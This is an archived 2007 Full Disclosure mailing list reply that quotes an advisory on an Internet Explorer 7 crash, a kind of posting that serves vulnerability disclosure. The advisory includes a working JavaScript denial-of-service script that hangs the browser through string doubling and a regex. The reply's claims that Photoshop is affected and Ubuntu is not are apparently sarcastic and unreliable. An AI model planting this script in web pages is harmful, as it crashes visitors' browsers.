Full Disclosure mailing list archives

Re: Internet Explorer Crash

From: "Dr. Neal Krawetz, PhD" <neal.krawetz () mac hush com>
Date: Tue, 17 Apr 2007 17:53:34 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I have confirmed that both Adobe Photoshop 7.0 and 7.1 are
vulnerable to this issue.  However all versions of Paint Shop Pro
that I tested are not vulnerable.  I repeat, Paint Shop Pro is not
vulnerable to this issue.

Ubuntu is not vulnerable to this issue in any way.

Good find buddy!

- - Dr. Neal Krawetz, PhD
http://www.hackerfactor.com/blog/


On Tue, 17 Apr 2007 13:09:50 -0400 "J. Oquendo"
<sil () infiltrated net> wrote:

Product: Internet Explorer Version 7.0.5730.11
Impact: Browser crash possibly more
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'


I. BACKGROUND
Why bother? Who doesn't know what Internet Explorer and Microsoft
are.

II. DESCRIPTION
IE 7 is vulnerable to a script which causes the browser to hang.
The
memory and CPU usage go through the roof. Originally the script
caused
(and still causes) Safari and Konqueror to crash.

III SOLUTION
Stop using Microsoft products or deal with a new advisory every
other
day.

IV. Proof
http://www.infiltrated.net/stupidInternetExploder.html

V. Code

$ more /stupidInternetExploder.html

<script>

var reg = /(.)*/;

var z = 'Z';
               while (z.length <=
9999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999) z+=z;
       var boum = reg.exec(z);

</script>

Goodbye


J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkYlQWQACgkQDpFP8dW5K4Z/bQQAhmwJc2y9RBZ7nFAEWo4Q/aIpvwVj
7Xa+Ax+CUSe1O+hINFX5I+hLoPckPNVoC3YtPA7rQqT6dQ3xIubFgZAGFs62v7p936yi
p4esv/frDaklOmlEGjVZqcoxJATwj8HBPthO3YZk5D1HRJhkQ0J72ucEkBgK6tw/YeuL
dUoEASE=
=FbVw
-----END PGP SIGNATURE-----

--
Become a medical transcriptionist at home, at your own pace.
http://tagline.hushmail.com/fc/CAaCXv1R3e4Y8wdXYkvHiVBp8Vi7B9M9/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Re: Internet Explorer Crash, (continued)
- Re: Internet Explorer Crash Nikolay Kichukov (Apr 17)
  - Re: Internet Explorer Crash Michal Majchrowicz (Apr 17)
- Re: Internet Explorer Crash Troy (Apr 17)
- Re: Internet Explorer Crash Kradorex Xeron (Apr 18)
  - Re: Internet Explorer Crash Valdis . Kletnieks (Apr 18)
    - Re: Internet Explorer Crash Pavel Kankovsky (Apr 21)
    - Re: Internet Explorer Crash cardoso (Apr 21)
- Message not available
  - Re: Internet Explorer Crash Michele Cicciotti (Apr 18)
- Internet Explorer Crash carl hardwick (Apr 17)
  - Re: Internet Explorer Crash 3APA3A (Apr 17)
- Re: Internet Explorer Crash Dr. Neal Krawetz, PhD (Apr 17)